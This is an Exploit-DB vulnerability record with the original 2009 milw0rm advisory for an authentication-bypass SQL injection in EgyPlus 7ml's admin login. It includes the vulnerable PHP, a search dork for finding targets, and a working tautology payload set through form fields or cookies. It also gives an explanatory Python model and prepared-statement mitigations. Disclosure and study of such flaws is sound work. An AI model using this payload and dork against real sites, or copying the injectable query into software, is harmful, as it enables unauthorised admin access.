Vendor: EgyPlus 7ml
By: Qabandi
CVSS: 8.8 (HIGH)
Title: Cookie Auth Bypass SQL injection vulnerability
CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
Product Name: EgyPlus 7ml
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:egyplus:egyplus_7ml
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)

EgyPlus 7ml 1.0.1 (the advisory title covers versions up to and including 1.0.1) is vulnerable to a Cookie Auth Bypass SQL injection vulnerability (CABSIV) in the admin login script ./cpanel/login.php. The script takes 'username' and 'password' from $_COOKIE whenever a 'username' cookie is present and from $_POST otherwise, splices both values unescaped into a SELECT against the admin table, and treats the login as successful when the query returns exactly one row. Because the cookie values take precedence over the form fields, an attacker can reach the injection either by submitting the login form or by setting the two cookies directly. The payload qabandi' or '1'='1 in both fields turns the WHERE clause into a tautology, so the query matches every admin row and the num_rows == 1 check passes when the table holds a single administrator (with more than one admin row this particular payload fails the check). The attacker controls the rest of the WHERE clause and can therefore use the same injection point to query the back-end database, although the script exposes nothing but the row count; the advisory demonstrates only the authentication bypass, not modification or deletion of data. The injection requires magic_quotes_gpc = Off, since magic quotes would escape the single quotes in the cookie and POST data.

Mitigation:

Use prepared statements with bound parameters for the login query instead of splicing user input into the SQL string, and compare against a password hash rather than a clear-text 'pass' column. The addslashes() change proposed in the advisory stops this particular payload but only escapes quote characters, so it is not a substitute for parameterized queries. Keeping the administrator's username and password in cookies, as the vulnerable script does, should be replaced with a server-side session.
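The following is an added example, not code from the advisory or from EgyPlus: it models the logic of ./cpanel/login.php in Python against an in-memory SQLite table so that it runs stand-alone. The admin rows, the cookie/POST dictionaries and the ADMINS/PAYLOAD constants are constructed for the demonstration. It reproduces the cookie-over-POST precedence, shows the advisory's payload passing the num_rows == 1 gate when there is one admin row and failing it when there are two, and contrasts the spliced query with the bound-parameter version the mitigation calls for.

```python
import sqlite3

# Constructed sample data (not from the advisory): the 'admin' table that
# ./cpanel/login.php queries. Passwords are clear text here because the
# original query compares the 'pass' column to the submitted value directly.
ADMINS = [("hazem", "s3cret")]

# The payload the advisory uses in both fields.
PAYLOAD = "qabandi' or '1'='1"


def make_db(admins=ADMINS):
    """Build an in-memory SQLite database holding the given admin rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (name TEXT, pass TEXT)")
    con.executemany("INSERT INTO admin VALUES (?, ?)", admins)
    return con


def pick_credentials(cookies, post):
    """Same precedence as the original script: a 'username' cookie wins over
    the form fields, so an attacker never has to submit the form at all."""
    if cookies.get("username"):
        return cookies.get("username", ""), cookies.get("password", "")
    return post.get("username", ""), post.get("password", "")


def login_vulnerable(con, username, password):
    """Mirror of the original check: both values are spliced into the SQL
    text and the login succeeds only when the query returns exactly one row.
    The advisory's payload makes the WHERE clause true for every row, so the
    gate passes with one admin and fails with two."""
    sql = ("select name,pass from admin where name = '%s' and pass = '%s'"
           % (username, password))
    rows = con.execute(sql).fetchall()
    return len(rows) == 1


def login_fixed(con, username, password):
    """Prepared statement with bound parameters: the quote characters in the
    input are compared as data and can no longer change the WHERE clause."""
    rows = con.execute(
        "select name,pass from admin where name = ? and pass = ?",
        (username, password),
    ).fetchall()
    return len(rows) == 1


if __name__ == "__main__":
    creds = pick_credentials({"username": PAYLOAD, "password": PAYLOAD}, {})
    print("cookie injection, one admin   :", login_vulnerable(make_db(), *creds))
    print("cookie injection, two admins  :",
          login_vulnerable(make_db(ADMINS + [("ali", "pw")]), *creds))
    print("same payload, bound parameters:", login_fixed(make_db(), *creds))
    print("real credentials, bound params:",
          login_fixed(make_db(), "hazem", "s3cret"))
```

In the PHP script itself the equivalent of login_fixed is a PDO or mysqli prepared statement, for example `$stmt = $pdo->prepare('select name,pass from admin where name = ? and pass = ?'); $stmt->execute([$username, $password]);`, which binds the two values instead of interpolating them into the query string.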
Source (Exploit-DB raw data):

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
          (  :  /    (_)    /           (      .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait, PEACE...

=Vuln:		EgyPlus 7ml <= 1.0.1 - Cookie Auth Bypass SQL injection vulnerability (CABSIV)
=INFO:		http://egyplus.org/article-2.htm
=Download:  	http://traidnt.net/vb/attachment.php?attachmentid=252224&d=1211197439
=DORK:  	"Powered By EgyPlus"

                             _-=/:Conditions:\=-_
---------------------------------------------------------------------------------
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off
--------------------------------------=_=---------------------------------------

                            _-=/:Vulnerable_Code:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::--

if($_COOKIE['username']){
$username = $_COOKIE['username']; <---- Not filtered
$password = $_COOKIE['password']; <---- Not filtered
}else{
$username = $_POST['username'];   <---- Not filtered
$password = $_POST['password'];   <---- Not filtered
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)  <---- Checks if MySQL statement is true then continues, FAIL...
{
---------------------------------------=_=--------------------------------------

                     _-=/:Proof-OF-Concept-or-Whatever:\=-_
---------------------------------------------------------------------------------
We have TWO ways to do this:

Login with these:

username: qabandi' or '1'='1
password: qabandi' or '1'='1


or we set cookies (longer version)
javascript:document.cookie = "username=qabandi' or '1'='1"
javascript:document.cookie = "password=qabandi' or '1'='1"
---------------------------------------=_=--------------------------------------

                            _-=/:SOLUTION:\=-_
---------------------------------------------------------------------------------
./cpanel/login.php::-- <== Change the code as following;

if($_COOKIE['username']){
$username = addslashes($_COOKIE['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_COOKIE['password']); <---- Filter with ADDSLASHES()
}else{
$username = addslashes($_POST['username']); <---- Filter with ADDSLASHES()
$password = addslashes($_POST['password']); <---- Filter with ADDSLASHES()
}

$sql=$hazemali->query("select name,pass from admin where
name = '$username' and
pass = '$password' ");

$AdminInfo=$hazemali->num_rows($sql);

if($AdminInfo==1)
{
---------------------------------------=_=--------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No offence, guys, there is no use in this hole. (Bdon za3al shabab, el-thaghra mafe mnha faydeh)
No More Private
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Salam to All Muslim Hackers.

# milw0rm.com [2009-06-03]